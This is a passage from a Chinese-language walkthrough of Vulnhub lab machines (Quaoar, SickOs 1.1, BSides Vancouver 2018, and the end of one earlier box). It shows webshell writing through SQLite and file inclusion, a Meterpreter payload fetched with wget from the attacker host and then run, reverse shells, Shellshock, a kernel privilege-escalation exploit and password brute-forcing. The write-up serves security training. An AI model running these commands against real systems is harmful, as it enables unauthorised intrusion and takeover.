1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h3><a name='header-n9316' class='md-header-anchor '></a>5. 文件包含漏洞</h3><p>瀏覽網站功能,發現一個連接為:<a href='http://192.168.1.3/view.php?page=tools.html' target='_blank' class='url'>http://192.168.1.3/view.php?page=tools.html</a></p><p>猜測存在文件包含漏洞。經過嘗試,可以成功包含Linux的passwd文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307882619884.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9323' class='md-header-anchor '></a>獲取Webshell</h2><h3><a name='header-n9324' class='md-header-anchor '></a>1. 嘗試通過新建數據庫getshell</h3><p>Sqlite數據庫一般應用在很多嵌入式設備當中,屬於單文件的數據庫,類似於Access數據庫。這里嘗試新建一個名為<code>shell.php</code>的數據庫文件,對應的會生成shell.php的一個文件。但是觀察到數據庫文件的路徑在<code>/usr/databases/test_users</code></p><p>那么,嘗試新建一個數據庫名為<code>../../var/www/html/shell.php</code>。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307866554332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>新建成功,但是發現過濾掉了<code>/</code>。此方法失敗,但留作記錄,算是一個突破點。</p><p> </p><h3><a name='header-n9335' class='md-header-anchor '></a>2. 嘗試導出文件getshell</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307867627327.jpg' alt='' referrerPolicy='no-referrer' /></p><p>payload:<code>ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');</code></p><p>通過這種方式寫文件,適用於以下場景:</p><ol start='' ><li>可直接訪問數據庫執行SQL語句。</li><li>堆疊查詢選項啟用(默認關閉)</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307875215505.jpg' alt='' referrerPolicy='no-referrer' /></p><p>執行失敗,放棄這個點。</p><h3><a name='header-n9353' class='md-header-anchor '></a>3. 利用phpliteadmin和文件包含漏洞getshell</h3><p>經過前期的嘗試,發現了文件包含漏洞和數據庫權限。兩者結合,即可getshell。方法如下:</p><ol start='' ><li>通過phpliteadmin新加一條數據,寫入數據庫文件。</li><li>利用文件包含漏洞包含數據庫文件getshell。</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307890668345.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307891213556.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><p> </p><h3><a name='header-n9371' class='md-header-anchor '></a>4. 種植Meterpreter shell</h3><p>首先生成一個msf的可執行木馬。</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf > ~/Desktop/msf.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307919687573.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后使用Python搭建一個簡單的Web Server:<code>python -m SimpleHTTPServer 80</code></p><p>之后利用前面獲得的一句話,執行命令,下載生成的木馬,並且運行。</p><p>下載木馬:<code>x=system('wget http://192.168.1.4:9999/msf.elf');</code></p><p>之后<code>x=system('ls');</code> 發現並沒有保存,推測是因為權限問題。那么,直接下載到<code>/tmp</code>目錄</p><p><code>x=system('wget http://192.168.1.4:9999/msf.elf -O /tmp/msf.elf');</code></p><p>查看一下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307925456818.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后添加執行權限並且運行。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">x=system('chmod +x /tmp/msf.elf');</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">x=system('/tmp/msf.elf');</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>結果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926464521.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><p> </p><h2><a name='header-n9401' class='md-header-anchor '></a>提升權限</h2><p>Linux提權的基本思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9408' class='md-header-anchor '></a>1. 使用msf提權</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>沒有發現可以利用的提權漏洞。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307944129988.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9417' class='md-header-anchor '></a>2. 溢出提權</h3><p>現在拿到了目標靶機的Meterpreter shell,簡單的看下信息。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926898597.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現系統為<code>Ubuntu 12.04 (Linux 3.2.0-23-generic)</code>。到<code>www.exploit-db.com</code>搜索對應的exp。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928156767.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這里使用第二個EXP。地址為:<code>https://www.exploit-db.com/exploits/33589/</code></p><p>使用方法:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928690163.jpg' alt='' referrerPolicy='no-referrer' /></p><p>首先使用Meterpreter的shell把C代碼寫入:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307929385748.jpg' alt='' referrerPolicy='no-referrer' /></p><p>進入shell,使用Python spawn一個shell。
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code>。</p><p>之后編譯執行exp。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931869735.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9443' class='md-header-anchor '></a>獲取flag</h2><p>在root的家目錄發現了<code>flag.txt</code>文件:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931748150.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9447' class='md-header-anchor '></a>靶場思路回顧</h2><p>至此,已經完成最終目標,回頭分析一下之前幾個失敗的點。</p><h3><a name='header-n9450' class='md-header-anchor '></a>1. 使用phpliteadmin寫馬失敗原因</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307932678504.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現網站的根目錄為<code>/var/www</code>而不是<code>/var/www/html</code>,其次<code>www</code>目錄的權限問題,不能直接寫shell。</p><p>但是<code>/var/www/</code>下的其他目錄,權限設置的非常大,可以直接寫shell。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307933864994.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9459' class='md-header-anchor '></a>2.再次利用phpliteadmin寫馬嘗試getshell</h3><p>在以上基礎上,我們知道了網站的絕對路徑,且網站目錄的其他文件夾權限設置有問題。</p><p>嘗試寫shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307936953989.jpg' alt='' referrerPolicy='no-referrer' /></p><p>成功寫入:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307937353945.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9472' class='md-header-anchor '></a>思路總結</h2><p>突破點總結:</p><ol start='' ><li>phpliteadmin登陸弱口令</li><li>通過phpliteadmin向數據庫文件寫入一句話木馬</li><li>利用LFI和數據庫文件getshell</li><li>MSF生成木馬,利用一句話尋找可寫目錄植入、運行</li><li>利用系統漏洞提權為root</li></ol><p>在完成這次靶場的過程中,可以有很多發散的思路,比如:</p><ol start='' ><li>文件包含漏洞,可以使用字典Fuzz一下各種配置文件和日志文件。比如通過包含SSH日志的方式getshell。</li><li>Fuzz一下網站的絕對路徑,利用phpliteadmin寫shell。</li></ol><p> </p><p>總體來說,此靶場很有意思。既考察了Web基本的漏洞、phpliteadmin的組合利用,也考察了目錄權限設置的知識點。可以有多種方式完成,可玩性高。</p><p> </p><h1><a name='header-n9507' class='md-header-anchor '></a>第十節 Quaoar</h1><h2><a name='header-n9508' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9509' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/hackfest2016/Quaoar.ova' target='_blank' class='url'>https://download.vulnhub.com/hackfest2016/Quaoar.ova</a></p><h3><a name='header-n9512' class='md-header-anchor '></a>運行環境</h3><ul><li>​本靶機提供了OVA格式的鏡像,官方推薦使用virtualbox,從Vulnhub下載之后,導入到viirtualbox即可運行。</li><li>靶機:修改靶機的網絡配置為橋接模式。</li><li>攻擊機:Kali虛擬機,同樣使用橋接模式,即可訪問靶機。</li></ul><h3><a name='header-n9523' class='md-header-anchor '></a>靶機說明</h3><p>本靶機的難度為初學者。</p><p>本靶機的滲透目標為滲透進靶機,找到flag,並拿到root權限。</p><p>作者推薦工具<code>nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra</code></p><h2><a name='header-n9530' class='md-header-anchor '></a>信息收集</h2><ul><li><p>ip發現</p><p>首先看一下Kali的網絡配置。
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/1.JPG' alt='' referrerPolicy='no-referrer' /></p><p>靶機IP機器直接說明</p></li></ul><p>   <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/2.JPG' alt='' referrerPolicy='no-referrer' /></p><ul><li><p>端口掃描與服務識別</p><p>確定目標IP之后,使用Nmap對目標進行更加詳細的探測:
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>解釋一下相關參數:</p><ul><li><code>-A</code> 詳細掃描目標IP,加載所有腳本,盡可能全面的探測信息;</li><li><code>-v</code> 顯示詳細的掃描過程;</li><li><code>-oN</code> 將掃描結果以普通文本的格式輸出到<code>nmap.txt</code>。
結果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/3.JPG' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>威脅建模</p><p>分析nmap的掃描結果,發現靶機開放了<code>22</code>和<code>80</code>端口,系統為<code>Linux</code>。<code>22</code>端口為<code>SSH</code>服務,<code>80</code>端口為<code>http</code>服務,Web容器為<code>Apache/2.2.22</code>。</p><p>通常Web會存在各種各樣的問題,經過初步分析,以Web作為初步的滲透入口。</p></li></ul><h2><a name='header-n9573' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n9575' class='md-header-anchor '></a>1. 使用dirb掃描網站目錄</h3><p><code>dirb http://172.19.0.182</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/4.JPG' alt='' referrerPolicy='no-referrer' /></p><p>發現robots.txt,upload目錄,wordpress目錄。</p><p>查看robots.txt,指向的也是wordpress目錄</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/5.JPG' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9586' class='md-header-anchor '></a>2. 弱口令</h3><p>利用wpscan進行掃描</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">wpscan -u http://172.19.0.182/wordpress --wp-content-dir wp-content --enumerate u</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating usernames ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Identified the following 2 user/s:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | Id | Login  | Name   |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | 1  | admin  | admin  |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | 2  | wpuser | wpuser |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Default first WordPress username 'admin' is still used</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Fri Jul  6 22:13:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 62</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 63.867 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:05</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 399px;"></div><div class="CodeMirror-gutters" style="display: none; height: 429px;"></div></div></div></pre><p> </p><p>嘗試弱口令<code>admin   admin</code>即可進入。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/6.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9599' class='md-header-anchor '></a>獲取Webshell</h2><h3><a name='header-n9600' class='md-header-anchor '></a>1. 嘗試通過修添加獲得shell</h3><p><code>cp /usr/share/webshells/php/php-reverse-shell.php shelly.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/7.JPG' alt='' referrerPolicy='no-referrer' /></p><p>對shell進行修改,然后本地開NC進行監聽,訪問一個不存在的頁面,得到shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/8.JPG' alt='' referrerPolicy='no-referrer' /></p><p>利用python獲得一個新shell</p><p><code>`python -c 'import pty; pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/9.JPG' alt='' referrerPolicy='no-referrer' /></p><p>在該權限下,獲取第一個shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/10.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9622' class='md-header-anchor '></a>提升權限</h2><h3><a name='header-n9623' class='md-header-anchor '></a>1. 查看應用密碼嘗試弱口令</h3><p>查看wordpress的配置文件</p><p>發現root的賬號密碼</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/11.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><p>得到root權限</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/12.JPG' alt='' referrerPolicy='no-referrer' /></p><p>拿到另一個flag</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/13.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h1><a name='header-n9642' class='md-header-anchor '></a>第十一節 SickOs 1.1</h1><h2><a name='header-n9643' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9644' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/sickos/sick0s1.1.7z' target='_blank' class='url'>https://download.vulnhub.com/sickos/sick0s1.1.7z</a></p><h3><a name='header-n9647' class='md-header-anchor '></a>運行環境</h3><ul><li>​本靶機提供了OVF格式的鏡像,官方推薦使用VMware Workstation,從Vulnhub下載之后,導入到VMware Workstation即可運行。</li><li>靶機:NAT自動獲取IP。</li><li>攻擊機:NAT自動獲取IP:192.168.202.128。</li></ul><h3><a name='header-n9658' class='md-header-anchor '></a>靶機說明</h3><p>本靶機目的是拿到root權限,讀取/root/a0216ea4d51874464078c618298b1367.txt文件。</p><h2><a name='header-n9661' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>靶機所處網段是192.168.202.1/24,使用nmap掃描獲取靶機IP:192.168.202.133。
<img src='https://i.imgur.com/Sa8He6D.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口掃描與服務識別
對該IP全端口掃描如下:</li></ul><p><img src='https://i.imgur.com/J4QyA5e.png' alt='' referrerPolicy='no-referrer' /></p><p>發現使用squid代理。嘗試設置瀏覽器代理,訪問<a href='http://192.168.202.133/' target='_blank' class='url'>http://192.168.202.133/</a>:
<img src='https://i.imgur.com/TgWO3gi.png' alt='' referrerPolicy='no-referrer' />
初步得到結果是通過掛代理對靶機IP進行漏洞挖掘。</p><h2><a name='header-n9680' class='md-header-anchor '></a>Web漏洞挖掘</h2><p>設置代理進行目錄爆破:
<img src='https://i.imgur.com/ECYErtb.png' alt='' referrerPolicy='no-referrer' /></p><p>訪問robots.txt:
<img src='https://i.imgur.com/540LyET.png' alt='' referrerPolicy='no-referrer' /></p><p>發現是wolfcms,前台都是一些靜態頁面,無可利用點。
<img src='https://i.imgur.com/8SFGttD.png' alt='' referrerPolicy='no-referrer' /></p><p>默認地址<a href='http://192.168.202.133/wolfcms/?/admin/' target='_blank' class='url'>http://192.168.202.133/wolfcms/?/admin/</a>進入管理后台:
<img src='https://i.imgur.com/qcutT1t.png' alt='' referrerPolicy='no-referrer' /></p><p>嘗試使用admin/admin弱口令進入后台,從提示信息可以看出cms版本<0.8.3.1,可能存在文件上傳漏洞:
<img src='https://i.imgur.com/9E9RE38.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9696' class='md-header-anchor '></a>獲取webshell</h2><h3><a name='header-n9697' class='md-header-anchor '></a>思路一</h3><p>后台可以上傳任意后綴文件,上大馬,獲取webshell:
<img src='https://i.imgur.com/jfLyKEn.png' alt='' referrerPolicy='no-referrer' /></p><p>直接讀取文件發現權限不夠,沒有回顯:
<img src='https://i.imgur.com/QfC7XrW.png' alt='' referrerPolicy='no-referrer' /></p><p>查看開放的端口,發現3306開啟,但是發現mysql版本大於5.1,無法udf提權:
<img src='https://i.imgur.com/YIMuln3.png' alt='' referrerPolicy='no-referrer' /></p><p>利用大馬功能反彈shell:
<img src='https://i.imgur.com/fJFfkXY.png' alt='' referrerPolicy='no-referrer' />
<img src='https://i.imgur.com/YRV0vtL.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9711' class='md-header-anchor '></a>思路二</h3><p>掃描目錄時還發現了cgi-bin目錄,通過百度發現可能存在bash漏洞可以直接getshell。利用nc反彈shell。
<img src='https://i.imgur.com/ySdDGRs.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9715' class='md-header-anchor '></a>提升權限</h2><p>嘗試使用su切換用戶或者sudo直接查看文件,發現沒權限:
<img src='https://i.imgur.com/Pr3iY30.png' alt='' referrerPolicy='no-referrer' /></p><p>進入網站部署的目錄:
<img src='https://i.imgur.com/8nWd3GZ.png' alt='' referrerPolicy='no-referrer' /></p><p>發現有配置文件,運氣好可能有存儲明文用戶密碼:
<img src='https://i.imgur.com/Q24NuxO.png' alt='' referrerPolicy='no-referrer' /></p><p>使用獲取的用戶密碼連接數據庫失敗,嘗試用對應密碼進行root登錄失敗。
<img src='https://i.imgur.com/qnjk8X0.png' alt='' referrerPolicy='no-referrer' /></p><p>查看系統的其他用戶,發現sickos賬戶很特別:
<img src='https://i.imgur.com/s3vVfpI.png' alt='' referrerPolicy='no-referrer' /></p><p>用戶名:sickos,密碼:john@123登錄成功。
<img src='https://i.imgur.com/RDHnQfj.png' alt='' referrerPolicy='no-referrer' /></p><p>sudo命令查看文件:
<img src='https://i.imgur.com/remDsux.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9737' class='md-header-anchor '></a>思路總結</h2><p>1.利用文件上傳漏洞或者bash漏洞獲取系統shell。</p><p>2.部署的網站可能會存儲數據庫等明文用戶密碼,可以加以利用。</p><h1><a name='header-n9742' class='md-header-anchor '></a>第十二節 BSides-Vancouver-2018-Workshop</h1><h2><a name='header-n9743' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9745' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova' target='_blank' class='url'>https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova</a></p><h3><a name='header-n9748' class='md-header-anchor '></a>靶機說明</h3><p>靶機用ValualBox創建,目標是在其上獲得root級訪問。</p><h3><a name='header-n9751' class='md-header-anchor '></a>目標</h3><p>Boot to root:獲得root權限和Flag。</p><h3><a name='header-n9754' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機:通過ValualBox打開虛擬機,網絡連接方式設置為主機模式(host-only),或者將虛擬機、Kali機都橋接到物理機的無線網卡。測試中使用VMWare導入虛機會無法獲得IP,使用ValualBox可正常獲得IP。</li><li>攻擊機:同網段下有Windows攻擊機(物理機),安裝有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.7、DirBuster、AWVS、Nessus等滲透工具。同樣可使用Kali Linux作為攻擊機,預裝了全面的滲透工具。</li></ul><h2><a name='header-n9762' class='md-header-anchor '></a>信息收集</h2><ul><li>IP識別</li></ul><p>啟動虛擬機,使用nmap掃描C段IP <code>nmap -sP 192.168.56.0/24</code> 獲得虛機IP 192.168.56.101</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服務識別</li></ul><p>Nmap命令:<code>nmap -p1-65535 -open -A 192.168.56.101 -oN BSides.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>匯總開放的端口和服務:</p><p>端口          服務       提示信息</p><p>21           FTP        vsftpd2.3.5 允許匿名登錄</p><p>22           ssh        OpenSSH 5.9p1</p><p>80           http       Apache httpd 2.2.22 (Ubuntu)</p><h2><a name='header-n9790' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>滲透方法一:</li><li>0x01 匿名登錄FTP獲得用戶</li></ul><p>Windows下使用XFTP匿名登錄FTP:在public目錄下,找到users.txt.bk文件,用記事本打開:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得5個用戶名:abatchy,john,mai,anne,doomguy</p><ul><li>0x02 用5個用戶名加弱口令字典進行ssh暴破</li></ul><p>Windows下可使用九頭蛇Hydra Windows版本或其他工具暴破,這里采用“超級弱口令檢查工具V1.0”進行暴破,線程不能開太高,否則虛機會掛,4線程。</p><p>字典的選擇,選用字典:darkweb2017-top10000.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破得到用戶名:anne   密碼:princess</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 登錄ssh,具有sudo權限,獲得flag </li></ul><p>使用Xshell工具ssh登錄賬號:anne 密碼:princess</p><p>執行id命令和sudo -l命令,發現anne具有sudo權限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>執行sudo -l /root命令,sudo cat /root/flag.txt命令,獲得flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>滲透方法二:</li><li>0x01 環境設置</li></ul><p>因需要用到Kali虛機, 需要調整將bsides虛擬機、Kali攻擊機都橋接到筆記本電腦的無線網卡,bsides虛擬機會重新獲得新IP。使用Namp掃描無線網卡C段可獲得bsides虛機的新IP為:172.20.10.8,Kali虛機的IP是:172.20.10.9。</p><p>Nmap命令:<code>nmap -sP 192.168.56.0/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>同樣匿名登錄FTP,獲得5個用戶名:abatchy,john,mai,anne,doomguy</p><ul><li>0x02 訪問80端口http服務</li></ul><p>訪問 <code>http://172.20.10.8/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問 <code>http://172.20.10.8/robots.txt</code> 發現/backup_wordpress目錄:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問 <code>http://172.20.10.8/backup_wordpress/</code>進入WordPress頁面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 使用wpscan掃描WordPress,暴破后台用戶名和密碼:</li></ul><p>(1)暴破用戶名,命令<code>wpscan -u http://172.20.10.8/backup_wordpress --enumerate u</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得用戶名:admin   john</p><p>(2)使用wpscan默認字典,暴破密碼:</p><p><code>wpscan --url wpscan -u http://172.20.10.8/backup_wordpress --wordlist /root/share/darkweb2017-top10000.txt --username john</code></p><p>暴破字典依然使用darkweb2017-top10000.txt弱口令字典:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破成功,獲得用戶名john 密碼enigma</p><h2><a name='header-n9883' class='md-header-anchor '></a>獲取shell</h2><ul><li>0x04 登錄並反彈shell</li></ul><p>(1)使用用戶名 john  密碼enigma登錄WordPress,登錄地址 <code>http://172.20.10.8/backup_wordpress/wp-login.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/14.jpg' alt='' 